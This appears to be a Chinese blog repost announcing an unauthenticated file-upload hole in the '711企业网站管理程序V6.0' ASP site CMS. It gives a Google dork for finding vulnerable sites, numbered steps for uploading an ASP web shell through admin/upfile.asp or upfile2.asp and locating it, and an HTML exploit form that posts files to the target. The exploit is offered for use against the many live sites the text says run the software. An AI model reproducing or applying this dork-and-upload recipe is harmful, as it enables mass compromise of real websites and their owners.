`

711企业网站管理程序V6.0再爆上传漏洞及利用

阅读更多

前些天出了个Cookies注入漏洞,今天又翻了看了下~  

在ADMIN目录有2个上传文件upfile.asp和upfile2.asp  

这2个组件的功能就是:无需登录后台,无需截包,直接本地修改代码就能上传asp文件,无语中。。。。  

另外,更可爱的是写这套程序的还为我们编写一套可用万能密码直接登录的后台。据谷歌报道,存在此套系统的用户多达1,050,000 。继续无语中。。。  


1,谷歌里写上inurl:List.asp?Shop_ID  
2,如果网站存在以上上传文件,90%能上传asp文件。 
3,将图片123中地址替换成自己检测的网站地址即可 。 
4,在选择图片文件里直接上传asp文件。 (其实能上传任意后缀的文件。) 
5,打开网站首页,寻找图片真实地址。一般shell地址为
http://www.XXX.com/pic/XXXXXX.asp  

罗嗦一句,上传组件不是有2个吗? 一般管理员会修改或者删第一个upfile.asp,第二个也是可以利用的upfile2.asp 


如果测试失败。说明此漏洞已经打上补丁。如果没有打补丁测试失败,引用一段话:在一般情况下,某事物个体发生具有自身特有属性的负面现象,而这种现象无法从科学的角度得到合理的解释,但它又确实存在,我们一般称之为人品问题.(RPWT)”   -----------摘自《辞海》第874页  

EXP: 


<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<link href="style.css" rel="stylesheet" type="text/css"> 
</head> 
<body leftmargin="0" topmargin="0" bgcolor="#CEDBFF"> 
        <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"> 
<form name="myform" method="post" action="
http://www.XXXX.com/admin/upfile.asp" enctype="multipart/form-data" language="javascript" onsubmit="return check();"> 
          <tr align="center" valign="middle">  
            <td height="15" align="left"> 选择图片:  
              <input type="file" name="file1" value=""> <input type="submit" value="上传" name="B1" class="txt " isshowprocessbar="True"></td> 
          </tr> 
      </form> 
        </table> 
</body> 
</html>

分享到:
评论

相关推荐

    [企业政府]e新时代企业网站管理系统 v6.0 SQL版_exinshidaisql.zip源码ASP.NET网站源码打包下载

    [企业政府]e新时代企业网站管理系统 v6.0 SQL版_exinshidaisql.zip源码ASP.NET网站源码打包下载[企业政府]e新时代企业网站管理系统 v6.0 SQL版_exinshidaisql.zip源码ASP.NET网站源码打包下载[企业政府]e新时代企业...

    [企业政府]e新时代企业网站管理系统 v6.0 ACC版_exinshidai.zip源码ASP.NET网站源码打包下载

    [企业政府]e新时代企业网站管理系统 v6.0 ACC版_exinshidai.zip源码ASP.NET网站源码打包下载[企业政府]e新时代企业网站管理系统 v6.0 ACC版_exinshidai.zip源码ASP.NET网站源码打包下载[企业政府]e新时代企业网站...

    360天擎终端安全管理系统V6.0-R6管理员手册(V2019.09.09).pdf

    360天擎终端安全管理系统V6.0-R6管理员手册 天擎终端安全管理系统是面向政府、企业、金融、军队、医疗、教育、制造业等大型企事业单位推出的集防病毒与终端安全管控于一体的解决方案。天擎终端安全管理系统,以...

    188旅游网站管理系统 v6.0

    《188旅游网站管理系统 v6.0:打造高效便捷的在线旅游服务平台》 188旅游网站管理系统 v6.0 是一款专为旅游业设计的高效管理平台,它集成了PHP编程语言,以Tripscms为核心,旨在为旅游企业提供全方位的信息化解决...

    极域课堂管理系统软件V6.0 2016 豪华版.zip

    极域课堂管理系统软件V6.0 2016 豪华版这个可以适合学校,不适合家庭注意!!想要的可以下载.

    IIS_6.0文件解析漏洞及解决办法

    IIS 6.0 文件解析漏洞及解决办法 IIS 6.0 文件解析漏洞是指在 IIS 6.0 中的一个安全漏洞,该漏洞允许攻击者上传恶意文件并执行恶意代码,从而获得网站的控制权。该漏洞是由于 IIS 6.0 在处理文件夹扩展名时的错误...

    尼特NT8001系列控制器配置程序最新版V6.0

    总体来说,尼特NT8001系列控制器配置程序V6.0是基于C#开发的,利用微软的开发工具和技术,提供了一套全面的后端解决方案,旨在优化控制器的配置和管理,提高工业自动化系统的效率和可靠性。对于用户而言,它提供了...

    Microsoft Windows SDK v6.0A

    8. **DirectX SDK**:v6.0A版本可能也包含了DirectX SDK,允许开发者利用图形、音频、输入等多媒体功能。 通过Windows SDK v6.0A,开发者可以使用C、C++、C#等语言,开发原生的Win32应用程序,也可以进行.NET ...

    IIS6.0上传漏洞伪静态规则

    **IIS6.0上传漏洞详解** IIS(Internet Information Services)是微软公司推出的一款用于Windows操作系统的Web服务器,版本6.0是其中的一个经典版本。然而,它存在一些安全漏洞,其中一个著名的问题就是“上传漏洞...

    V6.0下载专用

    V6.0下载专用V6.0下载专用V6.0下载专用

    Borland Delphi v6.0

    10. **多线程支持**:随着多核处理器的出现,v6.0提供了更好的多线程开发支持,允许开发者充分利用硬件资源创建高性能的应用程序。 总的来说,Borland Delphi v6.0是一个强大的开发工具,它的出现推动了Windows应用...

    iFIX_v6.0_Chinese ifix6.0中文

    iFIX_v6.0_Chinese ifix6.0中文

    SIMATIC ProToolPro V6.0 SP3安装包-链接地址.txt

    SIMATIC ProToolPro V6.0 SP3安装包_链接地址

    天正T20插件V6.0.rar.zip

    《天正T20插件V6.0详解与应用》 天正T20插件V6.0是一款专为建筑设计领域的用户设计的增强工具,它基于Autodesk的AutoCAD平台,旨在提升设计师在使用天正建筑软件T20时的工作效率和设计精度。这款插件集合了多项实用...

    vs2008专用Microsoft SDKs v6.0A.zip

    5. 支持Windows Vista和Server 2008:SDKs v6.0A特别关注Windows Vista和Server 2008的新特性和API,使得开发者能够充分利用这些操作系统的特性,如UAC(用户账户控制)、桌面窗口管理器(DWM)等。 6. 设备开发:...

    金蝶档案管理软件V6.0管理员初始化配置手册[1]借鉴.pdf

    金蝶档案管理软件V6.0管理员初始化配置手册[1]借鉴.pdf

    2020极域电子教室V6.0

    《2020极域电子教室V6.0:打造高效智能的教学环境》 极域电子教室是一款专为教育领域设计的远程教学软件,旨在提升课堂教学效率,优化教学过程,实现教师与学生间的互动交流。作为2020年推出的V6.0版本,它在原有...

    构建中小企业网络V6.0学习课件

    构建中小企业网络V6.0学习课件 ppt

    360天擎终端安全管理系统 V6.0.pdf

    360天擎终端安全管理系统 V6.0提供了安全运维管控、流量管理、非法外联流量监控、应用程序安全、网络安全、桌面安全加固等功能,保护企业的信息安全。 360天擎终端安全管理系统 V6.0是一款功能强大的一体化终端安全...

Global site tag (gtag.js) - Google Analytics